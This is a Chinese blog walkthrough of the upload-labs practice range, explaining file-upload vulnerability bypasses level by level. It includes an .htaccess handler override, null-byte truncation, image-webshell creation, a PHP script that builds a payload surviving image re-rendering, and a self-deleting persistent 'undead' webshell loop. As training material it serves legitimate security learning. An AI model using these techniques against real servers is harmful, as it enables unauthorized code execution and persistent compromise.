文件上传漏洞总结

漏洞介绍

文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。一般都是指“上传Web脚本能够被服务器解析”的问题。

漏洞详解

我们的测试平台:upload_labs
环境:phpstudy2016 强烈建议用2016 会方便很多

我们上传文件会被前端拦截

wKg0C2OMNX6AVwnQAABFbQOcC4c101.png

右键查看网页源代码,发现在上传时候调用了checkFile方法进行了检查,如果检查失败会返回false导致上传失败wKg0C2OMNYeAEZFBAABCBUwIQUs460.png

wKg0C2OMNZuAOJKIAAB3anXVHHs915.png三种解决方法
其实是4种,但是禁用前端js可能造成很多麻烦我们去掉这种
抓包修改文件类型
将shell的后缀改为jpg绕过前端验证,抓包时在改回php

wKg0C2OMNamAOJM4AAA3XoLL8Ic307.png

burp修改response返回值
刷新第一关页面,burp抓包拦截response包

wKg0C2OMNbSAJgxyAABkj0iPZ9k360.png

将onsubmit直接删除,或者将checkFile改为return true都可以绕过

wKg0C2OMNcSAQDmkAAAz7C4BfWI945.png

通过保存源代码修改action

wKg0C2OMNcuAQBovAAA5MoUvsMc810.png

原来网页代码是没有action的,如果没有action默认就是发送到本页面,我们修改function然后添加一个action就可以上传成功

这关判断了content-type类型,如果满足才可以上传否则就会出错

wKg0C2OMNdKAQFQvAABhDbfoxo496.png

抓包将修改类型上传成功

wKg0C2OMNdiAcEbAAC6GtyYg3g889.png

在这之前修改apache下的httpd.conf文件,将这条的注释去掉,代表php文件 phtml文件都可以解析为php ,当然我们也可以自己添加文件类型

wKg0C2OMNeCAJiULAAAldX3uEqU174.png

我们看一下源码

wKg0C2OMNeaAdV39AAC670Hosc611.png

因此我们可以上传phtml来绕过黑名单验证

wKg0C2OMNeyASi6EAACFqjEAkTE611.png

这关的源码其实和上一关相同,只不过出现了许多黑名单

wKg0C2OMNfKAFmktAABuoHpdF40251.png

修改配置文件,原本是none改为all,重启apache

wKg0C2OMNfiAMzkwAABWI46KWqE745.png

我们首先上传一个名字为.htaccess的文件

<FilesMatch "4">   //意思为和这个文件同目录的文件,只要名字中带有4都会被当做php解析
SetHandler application/x-httpd-php
</FilesMatch>

上传文件名为114.png文件,带有4所以被解析成php

wKg0C2OMNfAA8XAABtz9TFgu4528.png

第五关源码:

wKg0C2OMNgaABkrFAAB7gWwbohg600.png

对比第三关源码少了一个大小写转换

wKg0C2OMNgyAJhbqAABTHwM2mYQ694.png

由于他没有禁止大写,直接大写后缀上传

wKg0C2OMNhGAGqFNAABoqprujGE970.png

这关源码因为没有去掉最后的空格,因此在和数组进行比较时会匹配失败,导致上传成功,上传上的文件因为系统会自动把后边的空格去掉,形成一个可以解析的php后缀

wKg0C2OMNheAeT3IAACMshYgas740.png

burp抓包多加一个空格

wKg0C2OMNhyAexNCAAA46ERpyRY372.png

上传成功

wKg0C2OMNiOAKgm5AABVDIo0XqA127.png

和第六关思路一样,绕过之后系统会自动把点去掉

wKg0C2OMNiqAVUg9AAAkuZOySEE579.png

在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名
网站没有过滤::$DATA,我们可以绕过

wKg0C2OMNjCAA2D6AAA4yEQrbr4653.png

wKg0C2OMNjaAYGsnAABOOhno3lo334.png

这关把所有的都验证了,但是他是顺序执行只执行了一次 我们在shell.php后加上.(空格). 先删除一个点,然后最后去除空格,但是前面还有一个点没有去掉,导致绕过

wKg0C2OMNjuAdoCBAABAVhxhegs404.png

wKg0C2OMNkCALQ76AABcbzNRxxQ434.png

将文件名和数组中进行匹配,如果匹配上则把匹配内容改位空字符串
我们可以双写php绕过 pphphp

wKg0C2OMNkaAfVQtAABBtACJCM213.png

其实上面这几关全部可以用php..绕过,但是大家还是老老实实的用应该的方法练习一遍最好

00截断是当程序遇到00时会自动停止不再解析之后的内容,试用php5.3一下的版本,我们把版本切换到5.2.17
踩坑:需要把magic_quotes_gpc参数关闭,注意默认就是关闭的!!但是我尝试了还是不能成功,如果你也遇到这种情况,咱们打开之后再给他关闭一下就可以了。
上传路径可控,修改上传路径00截断上传成功

wKg0C2OMNk6AIQAwAADBGFLHE8773.png

因为是根据上传路径拼接的,所以不能在文件名的地方进行00截断

wKg0C2OMNmaAMT9AABJbqJyIYU072.png

这次的上传路径地址是post方法发送的

wKg0C2OMNmyABlLMAABOOR5eBQw259.png

get和post的区别就是get能自动url解码,而post却不能,因此我们要在burp里对%00进行解码

wKg0C2OMNnWAcUzaAABwm7PXOY964.png

上传成功

wKg0C2OMNnuAdoSPAACLR7KUuOo901.png

使用命令生成图片马

copy a.jpg /b + cc.php /a shell.jpg

上传成功之后使用include.php文件包含成功

wKg0C2OMNoOAGKo0AAEZZzZ0fcE101.png

操作一样。但是需要打开php_exif,本函数可用来避免调用其它 exif 函数用到了不支持的文件类型上或和 $_SERVER['HTTP_ACCEPT'] 结合使用来检查浏览器是否可以显示某个指定的图像。

imagecreatefrompng PNG 文件或 URL 新建一图像
二次渲染就是我们上传图像之后,发现图片某些位置被删除了,导致我们的命令不能成功执行,于是我们要把渲染过后的文件保存出来,使用16进制编辑器和没渲染的位置进行对比,找到不变的位置,在这里插入我们的恶意代码
我们上传图片马之后发现已经解析失败了

wKg0C2OMNpmAfEX0AABIQGIFlLg403.png

渲染后的文件

wKg0C2OMNpAZqBUAADhSas06Q681.png

渲染前的文件

wKg0C2OMNqaAUrTgAACSJBlv8XY740.png

但是手工插入很难成功,我们使用脚本

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

我们找到php 目录 执行 php 1.php 就会给我们生成一个1.png文件
010editor打开

wKg0C2OMNrCAcx4bAAAnSKaWSo270.png

之后使用这种形式传参就可以成功执行命令

wKg0C2OMNriAW7sXAAGebYHm1m0713.png

需要用到不死马

<?php
ignore_user_abort(true);
    set_time_limit(0);
    @unlink(__FILE__);
    $file = '555.php';
    $code = '<?php phpinfo();?>';
    while (1){
        file_put_contents($file,$code);
        usleep(5000);
    }
?>

我们看代码他是先将图片上传上去,才开始进行判断后缀名、二次渲染。如果我们在上传上去的一瞬间访问这个文件,那他就不能对这个文件删除、二次渲染。这就相当于我们打开了一个文件,然后再去删除这个文件,就会提示这个文件在另一程序中打开无法删除。

wKg0C2OMNsSAC7ZaAACboI04vs504.png

由于代码是先移动文件位置在对文件做判断,我们可以使用Burp不停抓包,利用判断之前的间隙运行成功不死马

wKg0C2OMNsqAPJvEAACdZxCHTg448.png

一个用于访问路径,一个用于上传,返回值200表示已经生成好了内存马

和十七关相同,只不过要用解析漏洞的路径

move_uploaded_file()有这么一个特性,会忽略掉文件末尾的 /.
所以我们把他修改为如图所示

wKg0C2OMNtOAHGm4AAA0Sacbpv8978.png

成功访问

wKg0C2OMNtmAG9kSAABNXfqwbPY925.png

wKg0C2OMNtATy9cAACJFSPjzMU346.png

问题出在这里,reset是获取第一个元素
但是如果我们传的参数为

$file=>{
'0'=>'upload20.php/'
'2'=>'jpg'
}

php的数组既可以当数组又可以当字典,这里其实是字典的用法
这时候呢reset函数取出第一个值是upload20.php 和点拼接 然后count获取长度为2 ,然后2-1为1 但是file数组中没有Key值为1的数字,所以返回为空 所以文件名为upload20.php/ 而$ext获取的是最后面的值因而为jpg也绕过了判断

wKg0C2OMNueADX89AABPIDJAKGE992.png

上传成功

wKg0C2OMNu6Ac4I1AAA70IWwbMg434.png

总结

条件: 寻找一个上传点,查看上传点是否可用。
利用: 首先判断是程序员自己写的上传点,还是编辑器的上传功能 如果是编辑器上传功能,goolge当前编辑器的漏洞 如果是程序员写的上传点 上传一个正常的jpg图片 查看上传点是否可用 上传一个正常的jpg图片,burp拦截,修改后缀为php (可以检测前端验证 MIME检测 文件内容检测 后缀检测) 上传一个正常的jpg图片,burp拦截, 00截断 1.php%00.jpg 判断服务器是什么类型,web服务器程序,是什么类型,版本号多少 利用解析漏洞

posted @ 2023-01-16 17:17  SecIN社区  阅读(450)  评论(0编辑  收藏  举报